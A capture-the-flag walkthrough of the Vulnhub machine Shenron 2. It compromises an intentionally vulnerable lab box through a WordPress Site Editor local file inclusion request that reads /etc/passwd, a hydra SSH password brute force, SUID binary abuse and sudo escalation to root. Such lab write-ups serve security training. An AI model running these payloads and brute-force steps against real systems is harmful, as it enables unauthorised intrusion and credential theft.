Shenron 2 Vulnhub Walkthrough

Madhav Mehndiratta -

Initial Enumeration

As usual, I started the initial enumeration by running a port scan using nmap, looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.120
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 15:39 IST
Nmap scan report for 192.168.1.120
Host is up (0.014s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4a:47:6b:46:48:c5:d7:8f:30:92:5b:0c:2b:a4:74:ae (RSA)
|   256 b0:4e:d6:4c:c2:4e:15:05:c4:21:1d:69:7d:f2:dc:79 (ECDSA)
|_  256 1b:c0:66:7a:65:68:9b:35:8c:63:d3:b9:d2:5b:f0:1c (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Highlights by HTML5 UP
8080/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.7
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: shenron-2 – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds

We have a SSH server running on port 22, Apache web server running on port 80 and port 8080. Let's open our web browser and see what's running on port 80.

We have a template website running on port 80. I tried enumerating it by running a gobuster scan to look for hidden files and directories but I did not find anything interesting, So next let's enumerate port 8080.

Port 8080 is running a WordPress website. But the website does not load correctly at first because it looks up for a hostname shenron. So I added shenron to my /etc/hosts file. 

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.1.120   shenron

Now we can visit http://shenron:8080 in our web browser.

As we know that this is a WordPress website, So I performed a wpscan to enumerate WordPress users and vulnerable plugins using the following command:

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ wpscan --url http://shenron:8080 --api-token $(cat /opt/wpscan-api) --enumerate

The wpscan showed us that a vulnerable plugin named Site Editor is installed.

Next, I searched on exploitdb using searchsploit if we have a public exploit available for this.

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ searchsploit Site Editor 1.1.1
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                       |  Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                               | php/webapps/25493.txt
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion                                                                            | php/webapps/44340.txt
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We have the PoC for an exploit which can be used to read any file on the system. So first I tried reading the /etc/passwd file using the following command:

curl http://shenron:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

The exploit worked successfully and we got two users named shenron and jenny.

Next, I tried to brute force the SSH password for user jenny using hydra.

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ hydra -l jenny -P /usr/share/wordlists/rockyou.txt shenron ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-14 17:09:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://shenron:22/
[STATUS] 147.00 tries/min, 147 tries in 00:01h, 14344253 to do in 1626:20h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344063 to do in 2128:12h, 16 active
[22][ssh] host: shenron   login: jenny   password: jenny
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-14 17:13:52

The username is jenny and the password is also jenny. We can use these credentials to login via SSH.

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ ssh jenny@shenron         
jenny@shenron's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.8.0-48-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

30 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Mon Apr  5 20:18:23 2021 from 192.168.1.6
jenny@shenron-2:~$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)

Privilege Escalation

Now that we have a shell on the box, our next task is to escalate our privileges to user shenron. For this, first I look for all the SUIDs using the following command:

jenny@shenron-2:~$ find / -type f -perm -u=s 2>/dev/null

The /usr/bin/Execute binary seemed interesting to me, so I downloaded it to my local machine and disassembled it using ghidra.

Okay, so what this binary does is, it copies /bin/bash to /mnt/bash and then gives it permission to run commands as user shenron.

Basically, after executing this binary, we will be able to run commands as user shenron using /mnt/bash.

So First, I executed /usr/bin/Execute by simply typing Execute  and observed that a binary was created in /mnt directory. Next, I used the /mnt/bash -p command to spawn a bash shell.

jenny@shenron-2:~$ Execute
jenny@shenron-2:~$ /mnt/bash -p
bash-5.0$ id
uid=1001(jenny) gid=1001(jenny) euid=1000(shenron) groups=1001(jenny)
bash-5.0$

Now you can see the euid is changed to 1000 which is for user shenron. Therefore we can now execute any commands as user shenron. Also we can read our first flag present in the /home/shenron/Desktop directory.

bash-5.0$ cd /home/shenron/Desktop
bash-5.0$ ls -lah
total 16K
drwx------  2 shenron shenron 4.0K Apr  5 19:13 .
drwxr-xr-x 16 shenron shenron 4.0K Apr  6 00:43 ..
-rwx------  1 shenron shenron   32 Apr  5 19:13 local.txt
-rwx------  1 shenron shenron   97 Apr  5 19:10 .pass
bash-5.0$ cat local.txt 
40252f8ffc3932fd2b5ae4995defb92

Root Shell

In the same directory in which we found our first flag, we also have a hidden file named .pass. On reading, we get some base32 encrypted string.

bash-5.0$ cat .pass 
KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK

After decrypting, we get the password for user shenron.

┌──(madhav㉿kali)-[~/ctf/vulnhub/shenron2]
└─$ echo KNUEK3SSN5HFG2CFNZJG6TSTNBCW4UTPJZJWQRLOKJXU4U3IIVXFE32OIBJWQRLOKJXU4I2TNBCW4UTPJZIGCU3TK5XVEZAK | base32 -d
ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd

We got the password for user shenron and now we can switch to user shenron using su shenron command.

Next, I checked if user shenron can run any commands as root, and found that user shenron can run all commands as user root!

shenron@shenron-2:~/Desktop$ sudo -l
[sudo] password for shenron: 
Matching Defaults entries for shenron on shenron-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shenron may run the following commands on shenron-2:
    (ALL : ALL) ALL

Now we can simply use sudo su command to get a root shell and read our final flag present in the root directory.

shenron@shenron-2:~/Desktop$ sudo su
root@shenron-2:/home/shenron/Desktop# cd /root
root@shenron-2:~# cat root.txt 
                                                               
  mmmm  #                                                 mmmm 
 #"   " # mm    mmm   m mm    m mm   mmm   m mm          "   "#
 "#mmm  #"  #  #"  #  #"  #   #"  " #" "#  #"  #             m"
     "# #   #  #""""  #   #   #     #   #  #   #   """     m"  
 "mmm#" #   #  "#mm"  #   #   #     "#m#"  #   #         m#mmmm
                                                               
Your Root Flag Is Here :- a89604e285437f789ff278d2239aea02

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Christi du Toit.